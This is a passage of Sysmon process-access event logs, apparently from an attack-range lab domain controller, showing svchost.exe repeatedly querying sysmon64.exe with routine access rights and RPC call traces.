C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 